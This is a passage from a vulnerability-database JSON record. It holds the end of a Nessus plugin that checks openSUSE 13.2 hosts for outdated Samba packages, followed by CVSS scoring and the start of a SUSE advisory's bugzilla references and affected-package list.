script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-pcp-pmda-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-pcp-pmda-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-tests-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-tests-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-atsvc-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-atsvc0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-atsvc0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-binding0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-binding0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-samr-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-samr0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-samr0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgensec-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgensec0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgensec0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-krb5pac-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-krb5pac0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-krb5pac0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-nbt-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-nbt0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-nbt0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-standard-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-standard0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-standard0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libnetapi-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libnetapi0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libnetapi0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libregistry-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libregistry0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libregistry0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-credentials-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-credentials0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-credentials0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-hostconfig-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-hostconfig0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-hostconfig0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-passdb-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-passdb0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-passdb0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-policy-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-policy0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-policy0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-util-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-util0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-util0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamdb-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamdb0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamdb0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient-raw-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient-raw0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient-raw0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbconf-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbconf0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbconf0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbldap-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbldap0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbldap0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libtevent-util-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libtevent-util0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libtevent-util0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libwbclient-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libwbclient0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libwbclient0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-client-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-client-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-core-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-debugsource-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-libs-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-libs-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-pidl-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-python-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-python-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-test-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-test-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-test-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-winbind-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-winbind-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-atsvc0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-atsvc0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libgensec0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libregistry0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libregistry0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbldap0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-4.2.4-34.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-devel / ctdb-pcp-pmda / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:37:02", "references": ["https://bugzilla.suse.com/958585", "https://bugzilla.suse.com/958581", "https://bugzilla.suse.com/973032", "https://bugzilla.suse.com/898031", "https://bugzilla.suse.com/917376", "https://bugzilla.suse.com/973031", "https://bugzilla.suse.com/942716", "https://bugzilla.suse.com/972197", "https://bugzilla.suse.com/936862", "https://bugzilla.suse.com/973832", "https://bugzilla.suse.com/913238", "https://bugzilla.suse.com/958583", "https://bugzilla.suse.com/958586", "https://bugzilla.suse.com/968973", "https://bugzilla.suse.com/964023", "https://bugzilla.suse.com/946051", "https://bugzilla.suse.com/901813", "https://bugzilla.suse.com/971965", "https://bugzilla.suse.com/924519", "https://bugzilla.suse.com/966271", "https://bugzilla.suse.com/958582", "https://bugzilla.suse.com/914279", "https://bugzilla.suse.com/947552", "https://bugzilla.suse.com/949022", "https://bugzilla.suse.com/973036", "https://bugzilla.suse.com/974629", "https://bugzilla.suse.com/913547", "https://bugzilla.suse.com/973034", "https://bugzilla.suse.com/973033", "https://bugzilla.suse.com/919309", "https://bugzilla.suse.com/912457", "https://bugzilla.suse.com/958584", "https://bugzilla.suse.com/968222"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbldap0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsmbldap0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc-atsvc0-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc-atsvc0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-standard-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-standard-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbconf-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbconf-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsamba-credentials0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsamba-credentials0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-policy-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-policy-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-client-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "samba-client-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "samba-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc-atsvc-devel-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc-atsvc-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-krb5pac0-4.2.4-34.1.i586.rpm", "packageName": "libndr-krb5pac0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient0-debuginfo-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbclient-devel-4.2.4-34.1.i586.rpm", "packageName": "libsmbclient-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libndr-standard0-4.2.4-34.1.i586.rpm", "packageName": "libndr-standard0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libdcerpc0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libdcerpc0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "samba-libs-4.2.4-34.1.i586.rpm", "packageName": "samba-libs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "ctdb-4.2.4-34.1.i586.rpm", "packageName": "ctdb", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libnetapi0-4.2.4-34.1.i586.rpm", "packageName": "libnetapi0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbldap-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbldap-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "samba-winbind-4.2.4-34.1.x86_64.rpm", "packageName": "samba-winbind", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-credentials0-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-credentials0-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libsmbclient-raw0-debuginfo-4.2.4-34.1.i586.rpm", "packageName": "libsmbclient-raw0-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsmbclient-raw0-debuginfo-32bit-4.2.4-34.1.x86_64.rpm", "packageName": "libsmbclient-raw0-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libsamba-util-devel-4.2.4-34.1.x86_64.rpm", "packageName": "libsamba-util-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "ctdb-pcp-pmda-4.2.4-34.1.i586.rpm", "packageName": "ctdb-pcp-pmda", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libnetapi0-4.2.4-34.1.x86_64.rpm", "packageName": "libnetapi0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libndr-standard0-4.2.4-34.1.x86_64.rpm", "packageName": "libndr-standard0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "i586", "packageFilename": "libgensec0-4.2.4-34.1.i586.rpm", "packageName": "libgensec0", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.2", "packageVersion": "4.2.4-34.1", "arch": "x86_64", "packageFilename": "libgensec-devel-4.2.4-34.1.x86_64.rpm", "packageName": 